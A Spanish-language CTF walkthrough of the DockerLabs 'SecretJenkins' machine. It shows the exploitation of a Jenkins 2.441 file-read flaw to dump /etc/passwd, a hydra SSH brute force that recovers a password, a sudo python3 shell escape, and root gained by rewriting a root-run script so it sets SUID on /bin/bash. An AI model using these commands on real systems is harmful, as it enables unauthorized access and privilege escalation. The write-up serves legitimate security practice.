SecretJenkins DockerLabs (Easy)
Instalación
Cuando obtenemos el .zip nos lo pasamos al entorno en el que vamos a empezar a hackear la maquina y haremos lo siguiente.
unzip secretjenkins.zipNos lo descomprimira y despues montamos la maquina de la siguiente forma.
bash auto_deploy.sh secretjenkins.tarInfo:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarlaPor lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 05:43 EST
Nmap scan report for spainmerides.dl (172.17.0.2)
Host is up (0.000039s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 94:fb:28:59:7f:ae:02:c0:56:46:07:33:8c:ac:52:85 (ECDSA)
|_ 256 43:07:50:30:bb:28:b0:73:9b:7c:0c:4e:3f:c9:bf:02 (ED25519)
8080/tcp open http Jetty 10.0.18
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(10.0.18)
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 secondsPor lo que vemos esta abierto el puerto 8080 que en este caso pertenece a un jenkins, si entramos en la pagina veremos un login, si probamos las credenciales por defecto veremos que no funciona, por lo que haremos lo siguiente:
Escalate user bobby
Vamos a ver de que version es el jenkins:
whatweb http://<IP>:8080/Info:
http://172.17.0.2:8080/ [403 Forbidden] Cookies[JSESSIONID.89c2315d], Country[RESERVED][ZZ], HTTPServer[Jetty(10.0.18)], HttpOnly[JSESSIONID.89c2315d], IP[172.17.0.2], Jenkins[2.441], Jetty[10.0.18], Meta-Refresh-Redirect[/login?from=%2F], Script, UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session]
http://172.17.0.2:8080/login?from=%2F [200 OK] Cookies[JSESSIONID.89c2315d], Country[RESERVED][ZZ], HTML5, HTTPServer[Jetty(10.0.18)], HttpOnly[JSESSIONID.89c2315d], IP[172.17.0.2], Jenkins[2.441], Jetty[10.0.18], PasswordField[j_password], Title[Sign in [Jenkins]], UncommonHeaders[x-content-type-options,x-hudson,x-jenkins,x-jenkins-session], X-Frame-Options[sameorigin]Vamos a ver si la version 2.441 de jenkins es vulnerable, pero vemos que si lo es, por lo que dejare el PoC en el siguiente link:
URL = Exploit Jenkins
Exploit
Si nos lo descargamos, lo tendremos que utilizar de la siguiente forma:
python3 51993.py -u http://<IP>:8080 -p /etc/passwdInfo:
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
bobby:x:1001:1001::/home/bobby:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
pinguinito:x:1002:1002::/home/pinguinito:/bin/bashPor lo que vemos funciona y hemos listado el archivo passwd.
Hydra
Vamos a intentar tirar fuerza bruta a los 2 usuarios que hemos encontrado:
users.txt
bobby
pinguinitohydra -L users.txt -P <WORDLIST> ssh://<IP> -t 64Info:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 05:58:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 28688798 login tries (l:2/p:14344399), ~448263 tries per task
[DATA] attacking ssh://172.17.0.2:22/
[22][ssh] host: 172.17.0.2 login: bobby password: chocolate
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.Por lo que vemos obtenemos las credenciales del usuario bobby, por lo que nos conectaremos por SSH.
SSH
ssh bobby@<IP>Metemos como contraseña chocolate y veremos que estamos dentro.
Escalate user pinguinito
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for bobby on c5b862b2d8af:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User bobby may run the following commands on c5b862b2d8af:
(pinguinito) NOPASSWD: /usr/bin/python3Vemos que podemos ejecutar el binario python3 como el usuario pinguinito, por lo que haremos lo siguiente:
sudo -u pinguinito python3 -c 'import os; os.system("/bin/bash")'Y con esto seremos el usuario pinguinito.
Escalate Privileges
Si hacemos sudo -l veremos lo siguiente:
Matching Defaults entries for pinguinito on c5b862b2d8af:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User pinguinito may run the following commands on c5b862b2d8af:
(ALL) NOPASSWD: /usr/bin/python3 /opt/script.pyVemos que podemos ejecutar el binario python3 en el directorio /opt/script.py como el usuario root.
Si vemos lo que hace el script:
import shutil
def copiar_archivo(origen, destino):
shutil.copy(origen, destino)
print(f'Archivo copiado de {origen} a {destino}')
if __name__ == '__main__':
origen = '/opt/script.py'
destino = '/tmp/script_backup.py'
copiar_archivo(origen, destino)Si vemos los permisos del script:
ls -la /opt/script.pyInfo:
-r-xr--r-- 1 pinguinito root 272 May 11 2024 /opt/script.pyVemos que somos el propietario del script, por lo que podremos hacer lo siguiente:
rm /opt/script.pyUna vez que lo hayamos eliminado, crearemos el script con el mismo nombre pero añadiendo lo siguiente:
echo -e "import os\n\nos.system('chmod u+s /bin/bash')\nprint('Permisos SUID aplicados a /bin/bash')" > /opt/script.pyAhora hacemos lo siguiente:
sudo /usr/bin/python3 /opt/script.pyInfo:
Permisos SUID aplicados a /bin/bashVamos a comprobar que se aplico correctamente:
ls -la /bin/bashInfo:
-rwsr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bashVemos que se aplico correctamente, por lo que haremos lo siguiente para ser root:
bash -pY con esto ya seremos root.
Last updated